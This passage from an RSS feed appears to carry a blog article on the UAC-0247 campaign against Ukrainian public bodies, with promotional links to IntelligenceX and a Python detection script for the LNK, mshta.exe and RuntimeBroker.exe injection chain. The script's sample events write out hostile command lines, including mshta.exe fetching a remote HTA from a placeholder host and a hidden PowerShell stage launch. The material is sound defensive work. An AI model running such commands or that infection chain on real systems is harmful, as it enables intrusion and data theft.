&lt;p&gt;To mitigate the risks associated with campaigns like UAC-0247, organizations should restrict the execution of file types commonly used in attacks, such as LNK, HTA, and JavaScript files. Limiting the use of built-in utilities like mshta.exe, PowerShell, and wscript.exe can also reduce the attack surface.&lt;/p&gt;

&lt;p&gt;In addition, organizations should invest in user awareness training to reduce the effectiveness of phishing attempts and implement strong monitoring systems to detect unusual activity.&lt;/p&gt;

&lt;h2&gt;
  
  
  Final Thoughts
&lt;/h2&gt;

&lt;p&gt;The UAC-0247 campaign highlights the growing sophistication of cyber threats targeting critical sectors. By combining social engineering with advanced malware techniques, attackers are able to infiltrate systems and extract sensitive information with minimal detection.&lt;/p&gt;

&lt;p&gt;To stay ahead of these threats, organizations must adopt a proactive and intelligence-driven security strategy. Leveraging tools like &lt;a href="https://intelligencex.org/" rel="noopener noreferrer"&gt;IntelligenceX&lt;/a&gt;, along with strong internal controls and continuous monitoring, can significantly improve an organization’s ability to detect and respond to evolving cyber risks.&lt;/p&gt;

</description>
    </item>
    <item>
      <title>UAC-0247 Campaign Targets Ukrainian Public Sector with Multi-Stage Data Theft Malware</title>
      <dc:creator>Abhay Negi</dc:creator>
      <pubDate>Sat, 18 Apr 2026 06:18:18 +0000</pubDate>
      <link>https://dev.to/abhay_negi_3025afed85d9a4/uac-0247-campaign-targets-ukrainian-public-sector-with-multi-stage-data-theft-malware-109e</link>
      <guid>https://dev.to/abhay_negi_3025afed85d9a4/uac-0247-campaign-targets-ukrainian-public-sector-with-multi-stage-data-theft-malware-109e</guid>
      <description>&lt;p&gt;Ukraine’s cybersecurity authority, CERT-UA, has uncovered a targeted cyber campaign aimed at government organizations and healthcare institutions, including clinics and emergency medical services. The operation, identified as UAC-0247, involves the delivery of sophisticated malware designed to extract sensitive data from Chromium-based browsers and WhatsApp environments.&lt;/p&gt;

&lt;p&gt;The campaign was active between March and April 2026, and although the identity of the attackers has not yet been confirmed, the structure and execution of the attack indicate a capable and persistent threat group. This activity highlights how attackers are increasingly combining social engineering techniques with complex malware chains to infiltrate critical infrastructure.&lt;/p&gt;

&lt;h2&gt;
  
  
  Phishing as the Initial Entry Point
&lt;/h2&gt;

&lt;p&gt;The attack begins with phishing emails crafted to resemble legitimate humanitarian aid proposals. This theme appears to be intentionally chosen to exploit trust and urgency, increasing the likelihood that recipients will engage with the message.&lt;/p&gt;

&lt;p&gt;Victims are prompted to click on a link included in the email. Depending on the scenario, this link leads either to a compromised legitimate website or to a fake page generated using artificial intelligence tools. In the case of legitimate sites, attackers exploit cross-site scripting vulnerabilities to inject malicious content. Regardless of the approach, the ultimate goal is to convince the victim to download and execute a malicious file.&lt;/p&gt;

&lt;h2&gt;
  
  
  Execution Flow and Payload Delivery
&lt;/h2&gt;

&lt;p&gt;Once the victim interacts with the malicious page, they are prompted to download a Windows shortcut (LNK) file. This file serves as the initial execution vector. When opened, it uses the Windows utility “mshta.exe” to launch a remote HTML Application (HTA).&lt;/p&gt;

&lt;p&gt;The HTA file plays a dual role. It presents a decoy interface to maintain the appearance of legitimacy while silently initiating the download of a secondary payload. This payload injects shellcode into trusted system processes such as RuntimeBroker.exe, allowing the malware to operate without drawing attention.&lt;/p&gt;

&lt;p&gt;CERT-UA has also identified more advanced variants of the attack that utilize a two-stage loader. The second stage is implemented using a custom executable format that supports structured code execution and dynamic linking. The final payload is both compressed and encrypted, making analysis and detection more challenging.&lt;/p&gt;

&lt;h2&gt;
  
  
  Establishing Remote Access
&lt;/h2&gt;

&lt;p&gt;A critical component of the campaign is the deployment of a reverse shell tool known as RAVENSHELL. This tool establishes a TCP connection with a command-and-control server, enabling attackers to execute commands remotely using standard system utilities like cmd.exe.&lt;/p&gt;

&lt;p&gt;In addition to RAVENSHELL, attackers deploy a malware family called AGINGFLY along with a PowerShell script named SILENTLOOP. AGINGFLY, developed in C#, provides full remote control capabilities over the infected system. It communicates with its command server using WebSockets and can execute commands, log keystrokes, download files, and deploy additional payloads.&lt;/p&gt;

&lt;p&gt;SILENTLOOP enhances the resilience of the attack by dynamically retrieving command-and-control server addresses from Telegram channels. It also includes fallback mechanisms to ensure continued communication even if primary channels are disrupted.&lt;/p&gt;

&lt;h2&gt;
  
  
  Data Exfiltration and Post-Compromise Activities
&lt;/h2&gt;

&lt;p&gt;Analysis of multiple incidents linked to UAC-0247 shows that attackers focus heavily on reconnaissance and data theft. Their primary targets include browser-stored credentials, session data, and private communications.&lt;/p&gt;

&lt;p&gt;To facilitate this, they deploy tools capable of decrypting the locally encrypted password and cookie stores of Chromium-based applications. They also use specialized utilities to decrypt WhatsApp Web data, enabling access to user conversations.&lt;/p&gt;

&lt;p&gt;Additional tools used in the campaign support network scanning, tunneling, and lateral movement, allowing attackers to expand their reach within compromised environments. Some components also include cryptocurrency mining capabilities, suggesting that financial motives may be part of the operation.&lt;/p&gt;

&lt;p&gt;There are also indications that individuals associated with Ukraine’s defense sector have been targeted. In these cases, malicious archives were distributed through messaging platforms, further extending the scope of the campaign.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why Detection Is Difficult
&lt;/h2&gt;

&lt;p&gt;The techniques used in this campaign make it particularly challenging to detect. By leveraging legitimate system utilities, encrypted payloads, and multi-stage execution chains, attackers are able to bypass many traditional security measures.&lt;/p&gt;

&lt;p&gt;This is where platforms like &lt;a href="https://intelligencex.org/" rel="noopener noreferrer"&gt;IntelligenceX&lt;/a&gt; can play an important role. By providing visibility into exposed infrastructure, malicious domains, and attacker behavior, &lt;a href="https://intelligencex.org/" rel="noopener noreferrer"&gt;IntelligenceX&lt;/a&gt; helps organizations identify threats before they escalate.&lt;/p&gt;

&lt;p&gt;Security teams can use &lt;a href="https://intelligencex.org/" rel="noopener noreferrer"&gt;IntelligenceX&lt;/a&gt; to monitor suspicious domains, analyze command-and-control infrastructure, and correlate threat intelligence across multiple sources. This level of insight is essential when dealing with advanced and stealthy campaigns.&lt;/p&gt;

&lt;h2&gt;
  
  
  Recommended Defensive Measures
&lt;/h2&gt;

&lt;p&gt;To reduce the risk associated with such attacks, CERT-UA recommends restricting the execution of potentially dangerous file types such as LNK, HTA, and JavaScript files. It is also important to limit the use of built-in Windows utilities like mshta.exe, PowerShell, and wscript.exe, which are frequently abused by attackers.&lt;/p&gt;

&lt;p&gt;Organizations should also strengthen their monitoring capabilities, educate users about phishing risks, and integrate threat intelligence into their security operations.&lt;/p&gt;
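&lt;p&gt;Restricting the utilities above removes the easy path; the telemetry those same utilities leave behind is what monitoring has to key on. The Python below is an added example, not a CERT-UA or vendor rule set, that runs five rules over process-creation, network-connection and remote-thread events in a Sysmon-like shape (EventID 1, 3 and 8): Explorer spawning a script host (an opened LNK or HTA), mshta.exe handed a URL, mshta.exe spawning a child or connecting outbound, and a thread created in RuntimeBroker.exe by an image outside a small allowlist. The events, field names, paths and addresses are constructed for the example and would map onto the schema of whatever EDR or SIEM is in use; the allowlist is an assumption to tune against a local baseline.&lt;/p&gt;

```python
"""Rules for the LNK, mshta.exe, RuntimeBroker.exe chain over process telemetry.

Added illustration, not a CERT-UA or vendor rule set.  Events are dicts in a
Sysmon-like shape (EventID 1 process create, 3 network connection,
8 CreateRemoteThread); the field names are this example's assumption and
map onto whatever the local EDR or SIEM emits.
"""
import json

SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe", "pwsh.exe"}
INJECTION_TARGETS = {"runtimebroker.exe"}
# Images that create threads in other processes on a stock Windows build.
# Assumption for this example; tune it against your own baseline.
THREAD_SOURCE_ALLOWLIST = {"csrss.exe", "svchost.exe"}


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rule_shortcut_to_script_host(ev):
    """Explorer spawning a script host directly is what an opened LNK or HTA looks like."""
    return (ev["EventID"] == 1 and basename(ev["Image"]) in SCRIPT_HOSTS
            and basename(ev["ParentImage"]) == "explorer.exe")


def rule_mshta_remote_hta(ev):
    """mshta.exe given a URL fetches and runs the HTA straight from the web."""
    cmd = ev.get("CommandLine", "").lower()
    return (ev["EventID"] == 1 and basename(ev["Image"]) == "mshta.exe"
            and ("http://" in cmd or "https://" in cmd))


def rule_script_host_child(ev):
    """Anything spawned by the decoy HTA is the background stage starting."""
    return ev["EventID"] == 1 and basename(ev["ParentImage"]) == "mshta.exe"


def rule_script_host_network(ev):
    """Outbound connections from mshta, wscript or cscript; PowerShell is left out as too noisy."""
    return (ev["EventID"] == 3
            and basename(ev["Image"]) in {"mshta.exe", "wscript.exe", "cscript.exe"})


def rule_remote_thread_into_runtimebroker(ev):
    """A thread created in RuntimeBroker.exe by an image outside the allowlist is the injection step."""
    return (ev["EventID"] == 8
            and basename(ev["TargetImage"]) in INJECTION_TARGETS
            and basename(ev["SourceImage"]) not in THREAD_SOURCE_ALLOWLIST)


RULES = (rule_shortcut_to_script_host, rule_mshta_remote_hta, rule_script_host_child,
         rule_script_host_network, rule_remote_thread_into_runtimebroker)


def analyze(events):
    """Return (rule name, UtcTime, offending image) for every rule each event trips."""
    alerts = []
    for ev in events:
        for rule in RULES:
            if rule(ev):
                image = ev.get("Image") or ev["SourceImage"]
                alerts.append((rule.__name__[len("rule_"):], ev["UtcTime"], image))
    return alerts


def analyze_jsonl(text):
    """Same rules over newline-delimited JSON, the shape a log shipper hands over."""
    return analyze(json.loads(line) for line in text.splitlines() if line.strip())


# Constructed telemetry for the example; hostnames, paths and addresses are placeholders.
SAMPLE_EVENTS = [
    {"EventID": 1, "UtcTime": "2026-04-02 09:14:03", "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" https://aid-proposal.example/proposal.hta'},
    {"EventID": 3, "UtcTime": "2026-04-02 09:14:04", "Image": r"C:\Windows\System32\mshta.exe",
     "DestinationIp": "203.0.113.10", "DestinationPort": 443},
    {"EventID": 1, "UtcTime": "2026-04-02 09:14:09",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"powershell.exe -NoProfile -WindowStyle Hidden -File C:\Users\victim\AppData\Local\Temp\stage2.ps1"},
    {"EventID": 8, "UtcTime": "2026-04-02 09:14:12",
     "SourceImage": r"C:\Users\victim\AppData\Local\Temp\loader.exe",
     "TargetImage": r"C:\Windows\System32\RuntimeBroker.exe"},
    # Ordinary activity that must stay silent.
    {"EventID": 1, "UtcTime": "2026-04-02 09:20:00", "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe"},
    {"EventID": 1, "UtcTime": "2026-04-02 09:20:30", "Image": r"C:\Windows\System32\RuntimeBroker.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe", "CommandLine": "RuntimeBroker.exe -Embedding"},
    {"EventID": 8, "UtcTime": "2026-04-02 09:21:00", "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\RuntimeBroker.exe"},
]


def sample_jsonl():
    """The same constructed events serialised one per line."""
    return "\n".join(json.dumps(ev) for ev in SAMPLE_EVENTS)


if __name__ == "__main__":
    for name, when, image in analyze(SAMPLE_EVENTS):
        print(when, name, image)
```

&lt;p&gt;Each rule is deliberately narrow so that a hit is cheap to triage; the first event in the sample trips two of them, which is the kind of stacking that separates a user opening a shortcut from this chain. The PowerShell network rule is omitted on purpose, because administrative scripting makes it noisy, and the same signal is already captured by the parent-child rule when PowerShell is launched from mshta.exe.&lt;/p&gt;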

&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;The UAC-0247 campaign demonstrates how modern cyber threats are evolving in complexity and sophistication. By combining social engineering with advanced malware techniques, attackers are able to target critical sectors with increasing precision.&lt;/p&gt;

&lt;p&gt;To effectively defend against such threats, organizations must adopt a proactive approach that includes improved visibility, intelligence-driven security, and strong internal controls. Leveraging platforms like &lt;a href="https://intelligencex.org/" rel="noopener noreferrer"&gt;IntelligenceX&lt;/a&gt;, along with robust cybersecurity practices, can significantly enhance an organization’s ability to detect and respond to these evolving threats.&lt;/p&gt;

</description>
    </item>
  </channel>
</rss>
